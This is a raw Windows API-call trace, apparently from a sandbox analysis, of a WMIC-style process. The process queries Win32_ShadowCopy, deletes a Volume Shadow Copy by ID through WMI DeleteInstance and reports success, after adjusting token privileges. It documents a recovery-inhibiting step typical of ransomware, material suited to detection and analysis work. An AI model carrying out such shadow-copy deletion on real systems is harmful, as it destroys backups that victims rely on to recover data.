[0091.993] lstrlenW (lpString="Shadow copy management.") returned 23 [0091.993] malloc (_Size=0x30) returned 0x2f85c0 [0091.993] lstrlenW (lpString="Shadow copy management.") returned 23 [0091.993] free (_Block=0x2fcc00) [0091.993] IUnknown:Release (This=0x1e104e0) returned 0x0 [0091.993] free (_Block=0x2fcbc0) [0091.993] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0091.993] lstrlenW (lpString="PATH") returned 4 [0091.993] lstrlenW (lpString="where") returned 5 [0091.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0091.993] lstrlenW (lpString="WHERE") returned 5 [0091.993] lstrlenW (lpString="where") returned 5 [0091.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0091.993] lstrlenW (lpString="/") returned 1 [0091.993] lstrlenW (lpString="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 43 [0091.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0091.993] lstrlenW (lpString="-") returned 1 [0091.993] lstrlenW (lpString="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 43 [0091.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0091.993] lstrlenW (lpString="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 43 [0091.993] malloc (_Size=0x58) returned 0x2fd020 [0091.993] lstrlenW (lpString="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 43 [0091.993] lstrlenW (lpString="/") returned 1 [0091.993] lstrlenW (lpString="delete") returned 6 [0091.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0091.994] lstrlenW (lpString="-") returned 1 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] malloc (_Size=0xe) returned 0x2fcbc0 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] lstrlenW (lpString="GET") returned 3 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0091.994] lstrlenW (lpString="LIST") returned 4 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0091.994] lstrlenW (lpString="SET") returned 3 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0091.994] lstrlenW (lpString="CREATE") returned 6 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0091.994] lstrlenW (lpString="CALL") returned 4 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0091.994] lstrlenW (lpString="ASSOC") returned 5 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0091.994] lstrlenW (lpString="DELETE") returned 6 [0091.994] lstrlenW (lpString="delete") returned 6 [0091.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0091.994] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.994] malloc (_Size=0x3e) returned 0x2fd080 [0091.994] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.994] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0091.994] malloc (_Size=0x18) returned 0x2fcc00 [0091.995] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0091.995] lstrlenW (lpString="FROM") returned 4 [0091.995] lstrlenW (lpString="*") returned 1 [0091.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0091.995] malloc (_Size=0x18) returned 0x2fcb80 [0091.995] free (_Block=0x2fcc00) [0091.995] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0091.995] lstrlenW (lpString="FROM") returned 4 [0091.995] lstrlenW (lpString="from") returned 4 [0091.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0091.995] malloc (_Size=0x18) returned 0x2fcc00 [0091.995] free (_Block=0x2fcb80) [0091.995] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0091.995] malloc (_Size=0x18) returned 0x2fcb80 [0091.995] free (_Block=0x2fcc00) [0091.995] free (_Block=0x2fd080) [0091.995] free (_Block=0x2fcb80) [0091.995] lstrlenW (lpString="SET") returned 3 [0091.995] lstrlenW (lpString="delete") returned 6 [0091.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0091.995] lstrlenW (lpString="CREATE") returned 6 [0091.995] lstrlenW (lpString="delete") returned 6 [0091.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0091.995] free (_Block=0x2fcef0) [0091.995] malloc (_Size=0x8) returned 0x2f6f20 [0091.996] lstrlenW (lpString="GET") returned 3 [0091.996] lstrlenW (lpString="delete") returned 6 [0091.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0091.996] lstrlenW (lpString="LIST") returned 4 [0091.996] lstrlenW (lpString="delete") returned 6 [0091.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0091.996] lstrlenW (lpString="ASSOC") returned 5 [0091.996] lstrlenW (lpString="delete") returned 6 [0091.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0091.996] WbemLocator:IUnknown:AddRef (This=0x1df1390) returned 0x3 [0091.996] free (_Block=0x30dfb0) [0091.996] lstrlenW (lpString="") returned 0 [0091.996] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0091.996] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.996] malloc (_Size=0x14) returned 0x2fcb80 [0091.996] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.996] GetCurrentThreadId () returned 0xab8 [0091.996] GetCurrentProcess () returned 0xffffffffffffffff [0091.996] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x20f540 | out: TokenHandle=0x20f540*=0x27c) returned 1 [0091.996] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f538 | out: TokenInformation=0x0, ReturnLength=0x20f538) returned 0 [0091.996] malloc (_Size=0x118) returned 0x2fd080 [0091.996] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x2fd080, TokenInformationLength=0x118, ReturnLength=0x20f538 | out: TokenInformation=0x2fd080, ReturnLength=0x20f538) returned 1 [0091.996] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x2fd080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-384493598, Attributes=0x4c95), (Luid.LowPart=0x0, Luid.HighPart=3133168, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0091.996] free (_Block=0x2fd080) [0091.996] CloseHandle (hObject=0x27c) returned 1 [0091.996] lstrlenW (lpString="GET") returned 3 [0091.996] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0091.997] lstrlenW (lpString="LIST") returned 4 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0091.997] lstrlenW (lpString="SET") returned 3 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0091.997] lstrlenW (lpString="CALL") returned 4 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0091.997] lstrlenW (lpString="ASSOC") returned 5 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0091.997] lstrlenW (lpString="CREATE") returned 6 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0091.997] lstrlenW (lpString="DELETE") returned 6 [0091.997] lstrlenW (lpString="delete") returned 6 [0091.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0091.997] malloc (_Size=0x18) returned 0x2fcc00 [0091.997] lstrlenA (lpString="") returned 0 [0091.997] malloc (_Size=0x2) returned 0x30dfb0 [0091.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff39314c, cbMultiByte=-1, lpWideCharStr=0x30dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.997] free (_Block=0x30dfb0) [0091.997] malloc (_Size=0x18) returned 0x2fcca0 [0091.997] lstrlenA (lpString="") returned 0 [0091.997] malloc (_Size=0x2) returned 0x30dfb0 [0091.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff39314c, cbMultiByte=-1, lpWideCharStr=0x30dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0091.997] free (_Block=0x30dfb0) [0091.997] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.997] malloc (_Size=0x3e) returned 0x2fd080 [0091.998] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0091.998] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0091.998] malloc (_Size=0x18) returned 0x2fcba0 [0091.998] free (_Block=0x2fcca0) [0091.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0091.998] lstrlenW (lpString="FROM") returned 4 [0091.998] lstrlenW (lpString="*") returned 1 [0091.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0091.998] malloc (_Size=0x18) returned 0x2fcca0 [0091.998] free (_Block=0x2fcba0) [0091.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0091.998] lstrlenW (lpString="FROM") returned 4 [0091.998] lstrlenW (lpString="from") returned 4 [0091.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0091.998] malloc (_Size=0x18) returned 0x2fcba0 [0091.998] free (_Block=0x2fcca0) [0091.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0091.998] malloc (_Size=0x18) returned 0x2fcca0 [0091.998] free (_Block=0x2fcba0) [0091.998] free (_Block=0x2fd080) [0091.998] malloc (_Size=0x18) returned 0x2fcba0 [0091.998] malloc (_Size=0x18) returned 0x2fcc20 [0091.998] malloc (_Size=0x18) returned 0x2fcc40 [0091.998] malloc (_Size=0x18) returned 0x2fcc60 [0091.998] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0091.998] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0091.999] malloc (_Size=0x18) returned 0x2fcc80 [0091.999] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0091.999] SysStringLen (param_1=" WHERE ") returned 0x7 [0091.999] malloc (_Size=0x18) returned 0x2fccc0 [0091.999] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0091.999] SysStringLen (param_1="ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 0x2b [0091.999] free (_Block=0x2fcc00) [0091.999] free (_Block=0x2fcc80) [0091.999] free (_Block=0x2fcc60) [0091.999] free (_Block=0x2fcc40) [0091.999] free (_Block=0x2fcc20) [0091.999] free (_Block=0x2fcba0) [0091.999] ??0CHString@@QEAA@XZ () returned 0x20f4b0 [0091.999] GetCurrentThreadId () returned 0xab8 [0091.999] malloc (_Size=0x18) returned 0x2fcba0 [0091.999] malloc (_Size=0x18) returned 0x2fcc20 [0091.999] malloc (_Size=0x18) returned 0x2fcc40 [0091.999] malloc (_Size=0x18) returned 0x2fcc60 [0091.999] malloc (_Size=0x18) returned 0x2fcc80 [0091.999] SysStringLen (param_1="\\\\") returned 0x2 [0091.999] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0092.000] malloc (_Size=0x18) returned 0x2fcc00 [0092.000] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0092.000] SysStringLen (param_1="\\") returned 0x1 [0092.000] malloc (_Size=0x18) returned 0x2fcce0 [0092.000] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0092.000] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0092.000] free (_Block=0x2fcc00) [0092.000] free (_Block=0x2fcc80) [0092.000] free (_Block=0x2fcc60) [0092.000] free (_Block=0x2fcc40) [0092.000] free (_Block=0x2fcc20) [0092.000] free (_Block=0x2fcba0) [0092.000] malloc (_Size=0x18) returned 0x2fcba0 [0092.000] malloc (_Size=0x18) returned 0x2fcc20 [0092.000] malloc (_Size=0x18) returned 0x2fcc40 [0092.000] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1df1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4029d0 | out: ppNamespace=0xff4029d0*=0x1e03c18) returned 0x0 [0092.004] free (_Block=0x2fcc40) [0092.004] free (_Block=0x2fcc20) [0092.004] free (_Block=0x2fcba0) [0092.004] CoSetProxyBlanket (pProxy=0x1e03c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0092.005] free (_Block=0x2fcce0) [0092.005] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0092.005] ??0CHString@@QEAA@XZ () returned 0x20f400 [0092.005] GetCurrentThreadId () returned 0xab8 [0092.005] malloc (_Size=0x18) returned 0x2fcce0 [0092.005] lstrlenA (lpString="") returned 0 [0092.005] malloc (_Size=0x2) returned 0x30dfb0 [0092.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff39314c, cbMultiByte=-1, lpWideCharStr=0x30dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0092.005] free (_Block=0x30dfb0) [0092.005] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 0x50 [0092.005] SysStringLen (param_1="") returned 0x0 [0092.005] free (_Block=0x2fcce0) [0092.005] malloc (_Size=0x18) returned 0x2fcce0 [0092.005] IWbemServices:ExecQuery (in: This=0x1e03c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'", lFlags=0, pCtx=0x0, ppEnum=0x20f408 | out: ppEnum=0x20f408*=0x1e03d18) returned 0x0 [0092.064] free (_Block=0x2fcce0) [0092.064] CoSetProxyBlanket (pProxy=0x1e03d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0092.067] IEnumWbemClassObject:Next (in: This=0x1e03d18, lTimeout=-1, uCount=0x1, apObjects=0x20f410, puReturned=0x20f420 | out: apObjects=0x20f410*=0x1e03d80, puReturned=0x20f420*=0x1) returned 0x0 [0092.068] malloc (_Size=0x18) returned 0x2fcce0 [0092.068] IWbemClassObject:Get (in: This=0x1e03d80, wszName="__PATH", lFlags=0, pVal=0x20f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0092.068] free (_Block=0x2fcce0) [0092.068] malloc (_Size=0x800) returned 0x2fd080 [0092.068] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x2fd080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0092.068] FormatMessageW (in: dwFlags=0x2500, lpSource=0x2fd080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x20f358, nSize=0x0, Arguments=0x20f368 | out: lpBuffer="뚐H") returned 0x67 [0092.069] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0092.069] malloc (_Size=0x68) returned 0x2fd890 [0092.069] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x2fd890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0092.069] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff402ab0 [0092.069] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0092.069] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0092.069] free (_Block=0x2fd890) [0092.069] free (_Block=0x2fd080) [0092.069] LocalFree (hMem=0x48b690) returned 0x0 [0092.069] IWbemServices:DeleteInstance (in: This=0x1e03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0093.112] IUnknown:Release (This=0x1e03d80) returned 0x0 [0093.112] malloc (_Size=0x800) returned 0x2fd080 [0093.112] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x2fd080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0093.112] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.113] malloc (_Size=0x20) returned 0x2fcef0 [0093.113] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x2fcef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0093.113] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff402ab0 [0093.113] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0093.113] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0093.113] free (_Block=0x2fcef0) [0093.113] free (_Block=0x2fd080) [0093.113] IEnumWbemClassObject:Next (in: This=0x1e03d18, lTimeout=-1, uCount=0x1, apObjects=0x20f410, puReturned=0x20f420 | out: apObjects=0x20f410*=0x0, puReturned=0x20f420*=0x0) returned 0x1 [0093.115] IUnknown:Release (This=0x1e03d18) returned 0x0 [0093.116] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.116] free (_Block=0x2fcca0) [0093.116] free (_Block=0x2fccc0) [0093.116] GetCurrentThreadId () returned 0xab8 [0093.116] ??0CHString@@QEAA@PEBG@Z () returned 0x20f5e8 [0093.116] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x20f5e8 [0093.117] lstrlenW (lpString="LIST") returned 4 [0093.117] lstrlenW (lpString="delete") returned 6 [0093.117] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0093.117] lstrlenW (lpString="ASSOC") returned 5 [0093.117] lstrlenW (lpString="delete") returned 6 [0093.117] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0093.117] lstrlenW (lpString="GET") returned 3 [0093.117] lstrlenW (lpString="delete") returned 6 [0093.117] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0093.117] ??1CHString@@QEAA@XZ () returned 0x8151501 [0093.117] WbemLocator:IUnknown:Release (This=0x1e03c18) returned 0x0 [0093.117] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0093.117] _kbhit () returned 0x0 [0093.118] free (_Block=0x2f6f20) [0093.118] free (_Block=0x2fcac0) [0093.118] free (_Block=0x2fcaa0) [0093.118] free (_Block=0x2fca80) [0093.118] free (_Block=0x2fca60) [0093.118] free (_Block=0x2f70a0) [0093.118] free (_Block=0x2fcb40) [0093.118] free (_Block=0x2f85c0) [0093.118] free (_Block=0x2fd020) [0093.118] free (_Block=0x2fcbc0) [0093.118] free (_Block=0x2fcfa0) [0093.118] free (_Block=0x2fcae0) [0093.118] free (_Block=0x2fcbe0) [0093.119] free (_Block=0x2f7140) [0093.119] free (_Block=0x2f6e00) [0093.119] free (_Block=0x2fcff0) [0093.119] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0093.119] free (_Block=0x2fce20) [0093.119] free (_Block=0x2fcb00) [0093.119] free (_Block=0x2fcb20) [0093.119] free (_Block=0x2fcf30) [0093.119] free (_Block=0x2fcb60) [0093.119] free (_Block=0x2f7ee0) [0093.119] free (_Block=0x2f7f30) [0093.119] free (_Block=0x2f7f80) [0093.119] free (_Block=0x2fcb80) [0093.119] free (_Block=0x2f6a20) [0093.119] free (_Block=0x2f6de0) [0093.119] free (_Block=0x2f8040) [0093.119] free (_Block=0x2f6dc0) [0093.119] free (_Block=0x2f8000) [0093.119] free (_Block=0x2f6d60) [0093.119] free (_Block=0x2f6d80) [0093.119] free (_Block=0x2f6c40) [0093.119] free (_Block=0x2f6c60) [0093.119] free (_Block=0x2f6be0) [0093.119] free (_Block=0x2f6c00) [0093.119] free (_Block=0x2f6ca0) [0093.119] free (_Block=0x2f6cc0) [0093.120] free (_Block=0x2f6d00) [0093.120] free (_Block=0x2f6d20) [0093.120] free (_Block=0x2f6b20) [0093.120] free (_Block=0x2f6b40) [0093.120] free (_Block=0x2f6ac0) [0093.120] free (_Block=0x2f6ae0) [0093.120] free (_Block=0x2f6b80) [0093.120] free (_Block=0x2f6ba0) [0093.120] free (_Block=0x2f6a60) [0093.120] free (_Block=0x2f6a80) [0093.120] free (_Block=0x2f69d0) [0093.120] free (_Block=0x2f69a0) [0093.120] free (_Block=0x2f6e90) [0093.120] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x2 [0093.120] WbemLocator:IUnknown:Release (This=0x1e03b28) returned 0x0 [0093.121] WbemLocator:IUnknown:Release (This=0x1e03a98) returned 0x0 [0093.121] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x1 [0093.121] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0093.121] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x0 [0093.121] free (_Block=0x2fc9e0) [0093.121] free (_Block=0x2fca00) [0093.121] free (_Block=0x2f8540) [0093.121] free (_Block=0x2fca20) [0093.121] free (_Block=0x2fca40) [0093.121] free (_Block=0x2f8580) [0093.121] free (_Block=0x2fc860) [0093.121] free (_Block=0x2fc880) [0093.121] free (_Block=0x2f83c0) [0093.122] free (_Block=0x2fc8a0) [0093.122] free (_Block=0x2fc8c0) [0093.122] free (_Block=0x2f8400) [0093.122] free (_Block=0x2fc7e0) [0093.122] free (_Block=0x2fc800) [0093.122] free (_Block=0x2f8340) [0093.122] free (_Block=0x2fc820) [0093.122] free (_Block=0x2fc840) [0093.122] free (_Block=0x2f8380) [0093.122] free (_Block=0x2fc960) [0093.122] free (_Block=0x2fc980) [0093.122] free (_Block=0x2f84c0) [0093.122] free (_Block=0x2fc9a0) [0093.122] free (_Block=0x2fc9c0) [0093.122] free (_Block=0x2f8500) [0093.122] free (_Block=0x2fc760) [0093.122] free (_Block=0x2fc780) [0093.122] free (_Block=0x2f82c0) [0093.122] free (_Block=0x2fc7a0) [0093.123] free (_Block=0x2fc7c0) [0093.123] free (_Block=0x2f8300) [0093.123] free (_Block=0x2fc8e0) [0093.123] free (_Block=0x2fc900) [0093.123] free (_Block=0x2f8440) [0093.123] free (_Block=0x2fc920) 